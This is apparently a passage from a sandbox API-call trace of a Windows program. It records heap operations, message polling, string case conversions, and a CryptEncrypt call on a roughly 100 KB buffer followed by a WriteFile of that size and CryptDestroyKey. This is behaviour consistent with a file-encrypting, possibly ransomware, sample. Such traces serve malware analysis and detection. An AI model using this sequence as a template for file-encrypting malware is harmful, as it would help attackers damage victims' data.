hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0101.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.169] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1868d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x18690) returned 1 [0101.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.169] CharLowerBuffW (in: lpsz="byte[99984]", cchLength=0xb | out: lpsz="byte[99984]") returned 0xb [0101.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.174] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.174] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.174] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.174] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.174] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.223] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37f0d78*, pdwDataLen=0x8cef60*=0x1868d, dwBufLen=0x18690 | out: pbData=0x37f0d78*, pdwDataLen=0x8cef60*=0x18690) returned 1 [0101.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.226] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.229] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.229] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.229] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.229] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.229] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.229] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.229] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.229] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.229] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.229] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.229] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.230] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.230] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.230] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.230] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.230] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.230] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.247] WriteFile (in: hFile=0x44c, lpBuffer=0x37c0048*, nNumberOfBytesToWrite=0x18690, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x18690, lpOverlapped=0x0) returned 1 [0101.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.250] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.250] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0101.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.250] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0101.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.250] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.250] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.250] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.250] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.250] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.335] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 1 [0101.335] TranslateMessage (lpMsg=0x8cedb0) returned 0 [0101.335] DispatchMessageW (lpMsg=0x8cedb0) returned 0x0 [0101.335] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0101.335] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0101.335] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.335] CryptDestroyKey (hKey=0x9a47c0) returned 1 [0101.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0101.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0101.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0101.337] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0101.337] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0101.337] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0101.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.337] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.338] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0101.338] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0101.338] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0101.338] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0101.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0101.338] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 